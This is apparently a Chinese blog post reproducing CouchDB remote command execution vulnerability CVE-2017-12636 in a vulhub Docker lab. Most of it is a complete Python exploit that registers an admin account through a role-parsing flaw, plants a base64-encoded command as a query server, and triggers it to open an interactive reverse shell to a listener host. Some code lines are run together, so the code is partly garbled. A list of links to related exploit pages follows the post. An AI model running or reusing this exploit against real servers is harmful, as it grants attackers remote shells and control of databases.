简介

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

影响版本

小于 1.7.0 以及 小于 2.1.1

环境搭建

https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636

执行如下命令启动Couchdb 1.6.0环境:

docker-compose up -d

漏洞复现

Poc

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuthtarget = 'http://192.168.1.101:5984'
command = rb"""sh -i >& /dev/tcp/192.168.1.101/443 0>&1"""
version = 1session = requests.session()
session.headers = {'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{"type": "user","name": "wooyun","roles": ["_admin"],"roles": [],"password": "wooyun"
}''')session.auth = HTTPBasicAuth('wooyun', 'wooyun')command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:host = session.get(target + '/_membership').json()['all_nodes'][0]session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')if version == 1:session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

Couchdb 任意命令执行漏洞(CVE-2017-12636)复现相关推荐

  1. wordpress 4.6任意命令执行漏洞(PwnScriptum)复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...

  2. couchdb 任意命令执行漏洞(cve-2017-12636)

    Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和 ...

  3. couchdb 任意命令执行漏洞 cve-2017-12636

    Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言 ...

  4. python直接执行代码漏洞_修复Python任意命令执行漏洞

    Author:JoyChou@美丽联合安全 Date:20180605 1. 前言 今天遇到一个不好做白名单的Python命令执行漏洞修复的问题.由于是shell=True导致的任意命令执行,一开始大 ...

  5. 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...

  6. FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)

    #FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...

  7. eyoucms 1.5.5任意命令执行漏洞(0day)

    eyoucms 1.5.5任意命令执行漏洞 文章目录 eyoucms 1.5.5任意命令执行漏洞 一.漏洞简介 二.漏洞影响 三.复现过程 漏洞位置 漏洞分析 漏洞利用 一.漏洞简介 eyoucms1 ...

  8. TamronOS IPTV系统 ping 任意命令执行漏洞

    TamronOS IPTV系统 ping 任意命令执行漏洞 目录 系统简介 漏洞描述 漏洞复现 总结 系统简介 TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商.酒店.学 ...

  9. 通达OA v11.9 getdata任意命令执行漏洞复现+利用

    1.产品简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...

最新文章

  1. [cocoapods]cocoapods问题解决
  2. mvc core2.1 Identity.EntityFramework Core 注册 (二)
  3. FFmpeg 源码学习(一):avformat_open_input 源码分析
  4. [Abp 源码分析]后台作业与后台工作者
  5. 怎么将手机QQ浏览器里面的文章分享给QQ好友
  6. Ceres Solver 非线性优化库
  7. 并发编程应用场景_linux网络编程之select函数的并发限制和poll函数应用举例
  8. 黑客入侵 - 认识黑客入侵的利器 嗅探软件
  9. linux 软件安装命令介绍
  10. python如何检验显著性差异_基于python的显著性检验
  11. python数学符号读法大全_数学符号读法大全
  12. Uninstalltool-专业卸载工具
  13. 开发一个商城小程序要多少钱
  14. 傻子也能看懂的迪杰斯特拉算法(转)
  15. 集成科大讯飞语音合成
  16. 计算机网络 华南理工大学期末重点 第二章 物理层 谢希仁
  17. 教你如何轻松做百度文库推广引流?
  18. 小米civi价格偏贵,要赢得消费者认可不容易
  19. 怎样从spring官网下载jar包呢?
  20. 毕业设计-基于协同过滤算法的高校图书书目推荐系统

热门文章

  1. Thinkpad导航键更换成上下翻页键
  2. matlab解决迷宫问题,用matlab处理蚂蚁迷宫问题
  3. 操作系统android的收银系统,基于Android的小微商户移动收银系统设计与实现
  4. 计算机二级C语言与专升本编程题(入门级),用函数isprime(x)判断[n,m](n<m)之间所有的素数,并求其和
  5. IT架构设计_隽语集(Design Thinking _0801)
  6. 蓝牙耳机那个牌子好?看完这几款你就明白了
  7. 排列组合的写法_排列组合A几几的 C几几的怎么算
  8. Nineka南卡POW-1充电宝:让三台手机同时复活的神器
  9. 前端脚手架搭建(part 1)
  10. TokenSky大会组委会致全球嘉宾的一封感谢信